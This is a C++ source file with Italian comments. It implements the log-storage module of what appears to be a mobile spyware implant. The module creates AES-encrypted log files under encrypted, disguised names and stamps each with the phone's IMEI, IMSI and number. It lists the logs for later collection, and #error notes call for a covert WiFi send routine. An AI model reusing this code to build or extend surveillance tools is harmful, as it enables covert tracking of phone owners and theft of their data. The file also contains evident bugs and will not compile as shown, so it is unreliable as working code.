#include "Log.h"
#include "Device.h"

#error Implementare una funzione per la lettura dei metadati e testare il WiFi
#error Implementare la WifiSend() con ricerca del BSSID

BOOL SortLogs(const LogInfo& lInfo, const LogInfo& rInfo) {
	return lInfo.date.QuadPart < rInfo.date.QuadPart;
}

Log::Log() : wName(NULL), wEncName(NULL), encryptionObj(NULL), hFile(INVALID_HANDLE_VALUE), pLogSnapshot(NULL){
	encryptionObj = new Encryption(g_AesKey, 128);
}

BOOL Log::CreateLog(UINT LogType, BYTE* pByte, UINT uAdditional) {
	LogStruct LogDescription;
	SYSTEMTIME st;
	FILETIME ft;
	UINT Seq = 0;
	DWORD dwWritten;
	WCHAR *completeName = NULL;

	// Questo log gia' esiste? Se si dobbiamo tornare con un errore
	if(hFile != INVALID_HANDLE_VALUE) {
		return FALSE;
	}

	if(wName) {
		delete[] wName;
		wName = NULL;
	}

	if(wEncName) {
		free(wEncName);
		wEncName = NULL;
	}

	// Nome del log: QMLxxxxxx.mob
	// MANAGEMENT - Se si cambia il formato bisogna cambiare il numero di byte allocato qui dentro
	wName = new(std::nothrow) WCHAR[wcslen(L"QMLxxxxxx.mob") + 1];

	if(wName == NULL)
		return FALSE;

	ZeroMemory(wName, WideLen(L"QMLxxxxxx.mob") + sizeof(WCHAR));

	// Il file non dovrebbe esistere, ma nel caso effettuiamo un loop fino a trovare
	// un posticino per questo log.
	while(1){
		wsprintf(wName, L"%s%06x%s", LOG_PREFIX, Seq, LOG_EXTENSION);
		wEncName = encryptionObj->EncryptName(wName, g_Challenge[0]);

		if(wEncName == NULL) {
			CloseLog();
			return FALSE;
		}

		completeName = GetCurrentPath(wEncName);

		if(completeName == NULL){
			CloseLog();
			return FALSE;
		}

		hFile = CreateFile(completeName, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

		if(hFile == INVALID_HANDLE_VALUE){
			break;
		}

		if(wEncName) {
			free(wEncName);
			wEncName = NULL;
		}

		if(completeName){
			delete[] completeName;
			completeName = NULL;
		}

		CloseHandle(hFile); // Chiudo il file e libero wEncName
		Seq++;

		if(Seq > 0x00ffffff) { // Creiamo un punto di stop
			delete[] completeName;
			CloseLog();
			return FALSE;
		}
	}

	hFile = CreateFile(completeName, GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);

	if(hFile == INVALID_HANDLE_VALUE){
		CloseLog();
		delete[] completeName;
		return FALSE;
	}

	if(wName) {
		delete[] wName;
		wName = NULL;
	}

	wName = completeName;

	Device *deviceObj = Device::self();

	if(deviceObj == NULL) {
		RemoveLog(wName);
		CloseLog();
		return FALSE;
	}

	GetSystemTime(&st);
	SystemTimeToFileTime(&st, &ft);

	// Riempiamo i membri della struttura
	ZeroMemory(&LogDescription, sizeof(LogDescription));
	LogDescription.uVersion = LOG_VERSION_01;
	LogDescription.uLogType = LogType;
	LogDescription.uHTimestamp = ft.dwHighDateTime;
	LogDescription.uLTimestamp = ft.dwLowDateTime;
	LogDescription.uAdditionalData = uAdditional;
	LogDescription.uDeviceIdLen = WideLen((deviceObj->GetImei())); // XXX Non sono NULL-terminati
	LogDescription.uUserIdLen = WideLen(deviceObj->GetImsi());
	LogDescription.uSourceIdLen = WideLen(deviceObj->GetPhoneNumber());

	// Creiamo un buffer grande abbastanza da contenere l'header e gli additional data
	UINT uHeaderLen = sizeof(LogDescription) + LogDescription.uDeviceIdLen + LogDescription.uUserIdLen
							+ LogDescription.uSourceIdLen + LogDescription.uAdditionalData;

	// Paddiamo la dimensione al prossimo AES block
	BYTE *pHeader = new(std::nothrow) BYTE[encryptionObj->GetNextMultiple(uHeaderLen)];

	if(pHeader == NULL) {
		RemoveLog(wName);
		CloseLog();
		return FALSE;
	}

	ZeroMemory(pHeader, encryptionObj->GetNextMultiple(uHeaderLen));

	// Copiamo nel buffer tutti i dati dell'header
	BYTE *pTmp = pHeader;

	memcpy(pTmp, &LogDescription, sizeof(LogDescription));
	pTmp += sizeof(LogDescription);

	if(LogDescription.uDeviceIdLen) {
		memcpy(pTmp, deviceObj->GetImei(), WideLen(deviceObj->GetImei()));
		pTmp += WideLen(deviceObj->GetImei());
	}

	if(LogDescription.uUserIdLen) {
		memcpy(pTmp, deviceObj->GetImsi(), WideLen(deviceObj->GetImsi()));
		pTmp += WideLen(deviceObj->GetImsi());
	}

	if(LogDescription.uSourceIdLen) {
		memcpy(pTmp, deviceObj->GetPhoneNumber(), WideLen(deviceObj->GetPhoneNumber()));
		pTmp += WideLen(deviceObj->GetPhoneNumber());
	}

	if(LogDescription.uAdditionalData) {
		memcpy(pTmp, pByte, uAdditional);
	}

	// Cifriamo tutto l'header
	UINT tHeaderLen = encryptionObj->GetNextMultiple(uHeaderLen);
	BYTE* pEncryptedHeader = encryptionObj->EncryptData(pHeader, &tHeaderLen);

	delete[] pHeader;
	pHeader = NULL;

	if(pEncryptedHeader == NULL){
		RemoveLog(wName);
		CloseLog();
		return FALSE;
	}

	// Scriviamo la prima DWORD in chiaro che indica la dimensione dell'header paddato
	if(WriteFile(hFile, (BYTE *)&tHeaderLen, sizeof(UINT), &dwWritten, NULL) == FALSE){
		RemoveLog(wName);
		CloseLog();
		delete[] pEncryptedHeader;
		return FALSE;
	}


	// Scriviamo ora l'header cifrato e gli additional data
	if(WriteFile(hFile, pEncryptedHeader, tHeaderLen, &dwWritten, NULL) == FALSE){
		RemoveLog(wName);
		CloseLog();
		delete[] pEncryptedHeader;
		return FALSE;
	}

	delete[] pEncryptedHeader;
	pEncryptedHeader = NULL;

	return TRUE;
}

BOOL Log::WriteLog(BYTE* pByte, UINT uLen) {
	DWORD dwWritten;
	UINT t_len = uLen;
	BYTE* encrypted = NULL;

	if(hFile == INVALID_HANDLE_VALUE){
		return FALSE;
	}

	// Cifra i byte e scrivili
	encrypted = encryptionObj->EncryptData(pByte, &t_len);

	if(encrypted == NULL){
		RemoveLog(wName);
		CloseLog();
		return FALSE;
	}

	// Spostati alla fine del file
	SetFilePointer(hFile, 0, 0, FILE_END);

	// Scriviamo la dword che identifica la quantita' (in chiaro, unpaddato) di byte nel blocco
	if(WriteFile(hFile, (BYTE *)&uLen, sizeof(UINT), &dwWritten, NULL) == FALSE){
		RemoveLog(wName);
		CloseLog();
		delete[] encrypted;
		return FALSE;
	}

	// E poi i dati cifrati
	if(WriteFile(hFile, encrypted, t_len, &dwWritten, NULL) == FALSE){
		RemoveLog(wName);
		CloseLog();
		delete[] encrypted;
		return FALSE;
	}

	// Lasciamo aperto l'handle al log, verra' usato dalla AppendLog()
	delete[] encrypted;
	return TRUE;
}

BOOL Log::CloseLog() {
	if(hFile != INVALID_HANDLE_VALUE){
		CloseHandle(hFile);
		hFile = INVALID_HANDLE_VALUE;
	}

	if(wName){
		delete[] wName;
		wName = NULL;
	}

	if(wEncName){
		free(wEncName);
		wEncName = NULL;
	}

	return TRUE;
}

// XXX Controllare se il nome gli arriva gia' completo di path
BOOL Log::RemoveLog(WCHAR* wLogName) {
	BOOL ret;

	if(wLogName == NULL)
		return FALSE;

	PWCHAR wName = GetCurrentPath(wLogName);
	
	if(wName == NULL)
		return FALSE;

	ret = DeleteFile(wLogName);

	delete[] wName;
	return ret;
}

list<LogInfo>* Log::ListLogs() {
	WIN32_FIND_DATA fd;
	FILETIME ft;
	list<LogInfo> *container = NULL;
	LogInfo tLogInfo;
	HANDLE hList = INVALID_HANDLE_VALUE;
	WCHAR *ext, *search, *prefix;

	// Come seed usiamo il primo byte del challenge
	ext = encryptionObj->EncryptName(LOG_EXTENSION, g_Challenge[0]);
	prefix = encryptionObj->EncryptName(LOG_PREFIX, g_Challenge[0]);

	// Qui ci sarebbe un piccolo leak nel caso di fallimento
	if(ext == NULL || prefix == NULL)
		return NULL;
	
	search = new(std::nothrow) WCHAR[wcslen(LOG_PREFIX) + 1 + wcslen(LOG_EXTENSION) + 1];

	if(search == NULL){
		free(ext);
		return NULL;
	}

	ZeroMemory(search, WideLen(LOG_PREFIX) + WideLen(LOG_EXTENSION) + (sizeof(WCHAR) * 2));

	wsprintf(search, L"%s*%s", prefix, ext);

	PWCHAR filePath = GetCurrentPath(search);

	delete[] search;
	free(ext);
	free(prefix);

	if(filePath == NULL)
		return NULL;

	hList = FindFirstFile(filePath, &fd);

	delete[] filePath;

	if(hList == INVALID_HANDLE_VALUE)
		return NULL;

	container = new(std::nothrow) list<LogInfo>;

	if(container == NULL) {
		CloseHandle(hList);
		return NULL;
	}

	container->clear();

	WCHAR *tFileName = GetCurrentPath(fd.cFileName);
	hFile = CreateFile(tFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

	if(hFile != INVALID_HANDLE_VALUE) {
		GetFileTime(hFile, &ft, NULL, NULL);
		CloseHandle(hFile);
		tLogInfo.date.HighPart = ft.dwHighDateTime;
		tLogInfo.date.LowPart = ft.dwLowDateTime;
		tLogInfo.pLog = tFileName;
		container->push_back(tLogInfo);
	} else {
		delete[] tFileName;
	}

	while(FindNextFile(hList, &fd)){
		tFileName = GetCurrentPath(fd.cFileName);
		hFile = CreateFile(tFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

		if(hFile != INVALID_HANDLE_VALUE) { 
			GetFileTime(hFile, &ft, NULL, NULL);
			CloseHandle(hFile);
			tLogInfo.date.HighPart = ft.dwHighDateTime;
			tLogInfo.date.LowPart = ft.dwLowDateTime;
			tLogInfo.pLog = tFileName;
			container->push_back(tLogInfo);
		} else {
			delete[] tFileName;
		}
	}

	FindClose(hList);
	container->sort(SortLogs);
	return container;
}
/*
list<WCHAR*>* Log::ListLogs() {
	struct log_info_data {
		WCHAR *pLog;
		ULARGE_INTEGER date;
	};

	WIN32_FIND_DATA fd;
	FILETIME ft;
	list<log_info_data> container;
	list<WCHAR *> *logs = NULL;
	log_info_data tLogInfo;
	HANDLE hList = INVALID_HANDLE_VALUE;
	WCHAR *ext, *search, *tmp;

	logs = new(std::nothrow) list<WCHAR *>;
	logs->clear();

	if(logs == NULL)
		return NULL;

	// Come seed usiamo il primo byte del challenge
	ext = encryptionObj->EncryptName(LOG_EXTENSION, g_Challenge[0]);

	if(ext == NULL){
		logs->clear();
		delete logs;
		return NULL;
	}

	search = new(std::nothrow) WCHAR[1 + wcslen(LOG_EXTENSION) + 1];
	memset(search, 0x00, sizeof(WCHAR) * (1 + wcslen(LOG_EXTENSION) + 1));

	if(search == NULL){
		logs->clear();
		delete logs;
		free(ext);
		return NULL;
	}

	search[0] = '*';
	wcscat_s(search, 1 + wcslen(LOG_EXTENSION) + 1, ext);

	PWCHAR filePath = GetCurrentPath(search);

	if(filePath == NULL){
		logs->clear();
		delete logs;
		free(ext);
		return NULL;
	}

	hList = FindFirstFile(filePath, &fd);

	if(hList == INVALID_HANDLE_VALUE){
		int err = GetLastError();
		logs->clear();
		free(ext);
		delete[] search;
		delete[] filePath;
		return NULL;
	}

	tmp = new(std::nothrow) WCHAR[wcslen(fd.cFileName) + 1];

	if(tmp == NULL){
		logs->clear();
		free(ext);
		delete[] search;
		delete[] filePath;
		FindClose(hList);
		return NULL;
	}

	memset(tmp, 0x00, WideLen(fd.cFileName) + sizeof(WCHAR));
	memcpy(tmp, fd.cFileName, WideLen(fd.cFileName));

	container.clear();

	WCHAR *tFileName = GetCurrentPath(fd.cFileName);
	hFile = CreateFile(tFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
	delete[] tFileName;

	if(hFile != INVALID_HANDLE_VALUE) {
		GetFileTime(hFile, &ft, NULL, NULL);
		tLogInfo.date.HighPart = ft.dwHighDateTime;
		tLogInfo.date.LowPart = ft.dwLowDateTime;
		tLogInfo.pLog = tmp;
		container.push_back(tLogInfo);
		logs->push_back(tmp);
		CloseHandle(hFile);
	}

	while(FindNextFile(hList, &fd)){
		WCHAR *tFileName = GetCurrentPath(fd.cFileName);
		hFile = CreateFile(tFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
		delete[] tFileName;

		GetFileTime(hFile, &ft, NULL, NULL);
		tLogInfo.date.HighPart = ft.dwHighDateTime;
		tLogInfo.date.LowPart = ft.dwLowDateTime;
		tLogInfo.pLog = tmp;
		container.push_back(tLogInfo);


		tmp = new(std::nothrow) WCHAR[wcslen(fd.cFileName) + 1];

		if(tmp == NULL){
			// XXX - andrebbe cancellata la memoria allocata dentro log prima di ritornare
			logs->clear();
			free(ext);
			delete[] search;
			delete[] filePath;
			FindClose(hList);
			return NULL;
		}

		memset(tmp, 0x00, WideLen(fd.cFileName) + sizeof(WCHAR));
		memcpy(tmp, fd.cFileName, WideLen(fd.cFileName));
		logs->push_back(tmp);
	}

	free(ext);
	delete[] search;
	delete[] filePath;
	FindClose(hList);

	return logs;
}*/

BOOL Log::MakeLogSnapshot() {
	list<LogInfo>::iterator iter;

	// Liberiamo il precedente snapshot se esiste
	if(pLogSnapshot != NULL){
		for(iter = pLogSnapshot->begin(); iter != pLogSnapshot->end(); iter++) {
			if((*iter).pLog) {
				delete[] (*iter).pLog;
				(*iter).pLog = NULL;
			}
		}

		pLogSnapshot->clear();
		delete pLogSnapshot;
		pLogSnapshot = NULL;
	}

	pLogSnapshot = ListLogs();

	if(pLogSnapshot == NULL)
		return FALSE;

	return TRUE;
}

list<LogInfo>* Log::GetLogSnapshot() {
	return pLogSnapshot;
}

Log::~Log() {
	list<LogInfo>::iterator iter;

	CloseLog();

	if(pLogSnapshot != NULL){
		for(iter = pLogSnapshot->begin(); iter != pLogSnapshot->end(); iter++) {
			if((*iter).pLog) {
				delete[] (*iter).pLog;
				(*iter).pLog = NULL;
			}
		}

		pLogSnapshot->clear();
		delete pLogSnapshot;
		pLogSnapshot = NULL;
	}

	if(encryptionObj)
		delete encryptionObj;
}
